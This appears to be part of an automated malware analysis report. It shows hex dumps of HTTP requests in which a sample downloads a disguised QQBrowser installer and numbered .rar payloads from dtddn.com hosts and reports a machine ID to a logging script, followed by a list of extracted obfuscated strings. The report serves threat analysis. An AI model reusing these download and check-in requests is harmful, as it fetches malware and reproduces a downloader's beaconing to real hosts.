0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f37342e 72617220 48545450   GET /74.rar HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000020 (00032)   2a0d0a55 7365722d 4167656e 743a204d   *..User-Agent: M
0x00000030 (00048)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000040 (00064)   61746962 6c653b20 57696e33 323b2057   atible; Win32; W
0x00000050 (00080)   696e4874 74702e57 696e4874 74705265   inHttp.WinHttpRe
0x00000060 (00096)   71756573 742e3529 0d0a486f 73743a20   quest.5)..Host: 
0x00000070 (00112)   646f776e 2e647464 646e2e63 6f6d0d0a   down.dtddn.com..
0x00000080 (00128)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x00000090 (00144)   2d416c69 76650d0a 0d0a6c64 6972312e   -Alive....ldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f37342e 72617220 48545450   GET /74.rar HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000020 (00032)   2a0d0a55 7365722d 4167656e 743a204d   *..User-Agent: M
0x00000030 (00048)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000040 (00064)   61746962 6c653b20 57696e33 323b2057   atible; Win32; W
0x00000050 (00080)   696e4874 74702e57 696e4874 74705265   inHttp.WinHttpRe
0x00000060 (00096)   71756573 742e3529 0d0a486f 73743a20   quest.5)..Host: 
0x00000070 (00112)   646f776e 2e737a2d 67756f67 656e672e   down.sz-guogeng.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   204b6565 702d416c 6976650d 0a0d0a2e    Keep-Alive.....
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 3051322d 446f776e 4926496e   02%20Q2-DownI&In
0x00000030 (00048)   666f313d 35303933 30323031 34393739   fo1=509302014979
0x00000040 (00064)   25323031 25323030 25323031 20485454   %201%200%201 HTT
0x00000050 (00080)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000060 (00096)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000070 (00112)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000080 (00128)   70617469 626c653b 2057696e 33323b20   patible; Win32; 
0x00000090 (00144)   57696e48 7474702e 57696e48 74747052   WinHttp.WinHttpR
0x000000a0 (00160)   65717565 73742e35 290d0a48 6f73743a   equest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f312e72 61722048   GET /lnk/1.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f322e72 61722048   GET /lnk/2.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f332e72 61722048   GET /lnk/3.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f342e72 61722048   GET /lnk/4.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f352e72 61722048   GET /lnk/5.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f362e72 61722048   GET /lnk/6.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f372e72 61722048   GET /lnk/7.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f382e72 61722048   GET /lnk/8.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f392e72 61722048   GET /lnk/9.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30442532 30323531 26496e66   02%20D%20251&Inf
0x00000030 (00048)   6f313d35 30393330 32303134 39373925   o1=509302014979%
0x00000040 (00064)   32303131 33353933 20485454 502f312e   20113593 HTTP/1.
0x00000050 (00080)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000060 (00096)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000070 (00112)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000080 (00128)   626c653b 2057696e 33323b20 57696e48   ble; Win32; WinH
0x00000090 (00144)   7474702e 57696e48 74747052 65717565   ttp.WinHttpReque
0x000000a0 (00160)   73742e35 290d0a48 6f73743a 206c6f67   st.5)..Host: log
0x000000b0 (00176)   2e647464 646e2e63 6f6d0d0a 436f6e6e   .dtddn.com..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0d0a 0d0a                ve........

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30442532 30323531 26496e66   02%20D%20251&Inf
0x00000030 (00048)   6f313d35 30393330 32303134 39373925   o1=509302014979%
0x00000040 (00064)   32303131 36363837 20485454 502f312e   20116687 HTTP/1.
0x00000050 (00080)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000060 (00096)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000070 (00112)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000080 (00128)   626c653b 2057696e 33323b20 57696e48   ble; Win32; WinH
0x00000090 (00144)   7474702e 57696e48 74747052 65717565   ttp.WinHttpReque
0x000000a0 (00160)   73742e35 290d0a48 6f73743a 206c6f67   st.5)..Host: log
0x000000b0 (00176)   2e647464 646e2e63 6f6d0d0a 436f6e6e   .dtddn.com..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0d0a 0d0a                ve........

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30442532 30323531 26496e66   02%20D%20251&Inf
0x00000030 (00048)   6f313d35 30393330 32303134 39373925   o1=509302014979%
0x00000040 (00064)   32303131 39373635 20485454 502f312e   20119765 HTTP/1.
0x00000050 (00080)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000060 (00096)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000070 (00112)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000080 (00128)   626c653b 2057696e 33323b20 57696e48   ble; Win32; WinH
0x00000090 (00144)   7474702e 57696e48 74747052 65717565   ttp.WinHttpReque
0x000000a0 (00160)   73742e35 290d0a48 6f73743a 206c6f67   st.5)..Host: log
0x000000b0 (00176)   2e647464 646e2e63 6f6d0d0a 436f6e6e   .dtddn.com..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0d0a 0d0a                ve........


Strings

080404B0
0msXQ6hOQGU
0O76Qy7mOO75nOyjnOQsnO+hn542XT42ZrD2DO7miP7YnOm+nOD7nEUInfG2XTD20B76QO7ynO74nOyPnOQPnBghnIZ2kH22qrD2nO72nO7nnO72nOydWn
0pXxicjN0qiaMhmdazX+TlKp3cjQTzDsj9baS9iPazi5jcKmaYbQTltaihtQTYbpZh4B3ccDSYIsj9bmaL
0QZXIeZnQQZKAQeGAQIrAQdqAKcxT3cxRPvxvQZnJ5ZKv5HdAQvCAYH6A69x9GNx08vXJMZLceZRv5HGAQj+AQdqAQZxAQZxi8vxAQZxFi5
0SROXsnyk2ErkBRvG+nY
0UG/+jgDyr6
0VJBLq5
0zZ2iCXePchlmAXC
1.00
181Pnlbgs8ohNcYX
1HxqQ1xoIwm
1RLzXRYr/QePy2NrkFnr/IB
28y9nv
2cS5nIhyIIs2vtato+IfvIsitqhr9e9UirIiIgIYHqIY95/vttsE4F9WKosiIg5jvr5RK2Z4z2k+XyiBzfcBzfLBzfiBzR59
2MXsdYg
2wd5
4mgnDIMLD0mo1ImdsB
4Oz12Bof2gOqFAngrsOhbBOxrK
4ZYOsdHj2iMP2mMHrUDJ0p+MrRtIvGBbQiOj
5btAs/1x//n5dPQPDj/8d/npPm1+y3y2p+/p/J/47m/4yAEdPPnzcwyl9Dnp/JAHd+Ag95fckHGmLxMMk8LMk8PMk86Mkgny
5hKYxD0b5O
+5jNT5j4ghjzhheLghljghJGgZ/slejsM+jsrhjelhjRghjtghlBghoGgTIsl4IszhjsrejeghjRghjtghlsgh/sgZIsgdjsMhjskdjeghjPghjtghRsghJlgZ1sgdjsMjjsrej3ghjRhhjnghlsgh/sgZ1slebsMhjskdjelhjPghjtghRsghblgZIslejsMhjsIdj3ghjRghjGghlPgh/sgZ1slebsM/jskdjelhjRkdewghRsghbsgTIslejszhjsrejeghjRghjtghlsgh/sgZlsle+szhjsIejelhjPghjaghlkgholgTIsle+sMOIs8hj3ghjRhhjGghljgh/sgZIsgdjsMjjsrej3ghj8hhjaghRsghblgZIslejsMhjsIdj3ghjRhhjtghlsgh/sgZ1sgdjsM+jskdjeghjPghjdghljgh/sgZlsle+szhjsrhjeMhjHhhjGghlPghbtgM+sgdjsM+jskdjelhjPghjaghlsghbsgZIslejszhjsIejelhjPghjdghljgh/sgZ1slj+sM5jskdjelhjQhhexghRsghblgTIsle+szhjsrejeghjRghjtghlsgh/sgZlsle+szhjsIejelhjPghjaghlsghbsgZIslejszhjsRejeghjRghjGghljgh/sgZ/sgdjsMhjskdj38ejRhhjGgh8xghblgTIslebszhjsr5j3ghjRghjGghljgh/sgZ/sgdjsM5jskdjeMhjPghexghRsgholgTIslj/szhjsrej3ghjQIdjGghjsgZkslhjsgMdW
5tHc43KE41w8X5ouX5cB
62lOvdlfh2lG22FfA2xWA9FsAL8OAdlO2Zlkxfl/w2lOA2lmA2lOAA
6aoM1x1KpM7p7W7dwa7d1kZ466IVt81C2ie
6h7ibkbwZi2Z2a2ovh2obgS+66BPt3b0RrBZjagntiKG
6hTMon4/SUDINsRvSkG4+BE5DUIG+J19adxmN2M/
6KbYig1pTWW
6kF/3ue
6zkMtRL
7TXuJUjVrQBJ
8Ib6j/GaUcrqU8U9EfM
+8PHU+AHs+/Mq+pm
8S6zsy6lh8s0hKIi
9Cmb/wml
9Qeg9uYczexPjxCP
9U3Zu0iI
9xlBp46
A4BYB
a4k7Wr5JWr9FWr2sSq8AWr6JSqkl
abvmsgsmkqzbhahgzaylgkwmtzogm
adfzevtjxteptnzrvokmlldtp
Adgw
Aew0474ti0PiPFPYJePY4QsDAALRq24NCTLiAFsvCeEYKU4R
aezibdkktxmwndgcr
afekjnyxakoppsxrekioomxrethjtwcwjonuswxvdthkextxzt
agddikqjjjmsmzudjimma
akppajqtnhk
akumetilckemjrkahygimeczn
AljJfbtHZAY
amhwykvcyfrgpswmk
aoalovfpwfocxoxplyksu
Ap2EjqkIzv
apuduijvsrwsqekfrvivhu
Arguments
ayakierezsoogmrjzmdjggqdcgdskbaicvcpienp
azauhocveypkmtntzdpygxqidmdngwfddcshfqpxrvqqttsfqergyzovqzq
B*\AF:\NLT387IF85192dW7Ax6tuw6\myslrqnsb.vbp
bainl
basmujlqpzzpm
BbDlvNu9AXDdhk0dhUG6BbLdh+goB5jxFNT3Pk7cAx
BBHERe
bbvmxwiruaahikchpuowbpmrezyvazqlieyapdpphnsuajfzsxhuphpuhrrndmeylhbdswssz
bdeyu
bfeu
bfnvtfxytnnibrjamvesdkhh
bfosmyealf
BHhx
bhlotcyxvcanibnhqlawcgnmjqpccfngykpawurayudffequnztzuyuemirtedfjbnrnimtsqhgxohxsvqkmsbhhzkprsv
biuevcflbbexup
bldvklnjjjofszsxjzzp
bmeqgtgkcdqscvauhcucvypeqvpgqzzdkqegkmtipfsueccwzkyzegx
bpmvtjs
bqdlpzyzex
brkhcfaovqehwuvcpfyabiptjusovdtsdemophdspucnnvshysbnhvcvsfeaki
brzeigvnwdkrlcleyxafnvqdggv
BUCWpap0TWnTnZn2tUn2pkA7BB6MrKpSey6TnZk87Wk+e5
BWIfZH8w2zsg/s9
byTxfUq8ZwHcf74pHwHnIw68
c7A+DXDCR+QR4yH1R+AJx7dmPBH/DrQLx+QmwBQbRrYWR+QLPBjCsyb
C9kRx9vqB8doQTAE7Cae
c9n/OwOvW/aWamaNF9aNOhq2ccD7PCOzu6DWjmX9u6aK
cacrzrkxbr
caokhrfagevrodffqgpsobstbkqt
ccgxrbwqnclhheqacslgbepahsfvkifprhamasdslqebuhtsztmdexsvschtdblkmxbstlh
ccjjpiqiq
ccovpcss
cdmsql
cgplweqphhlvqekerfeavjktlwyzexzdqvtjjghcuuyysvnreirnnklgtycmh
chiymo
cidvvyjogcgdjokkxhqitikowlfsihmwjvjiibsgjpt
cidvvzjowohuzrndwxhyjlchvrlinfmwjvjixqbloqkh
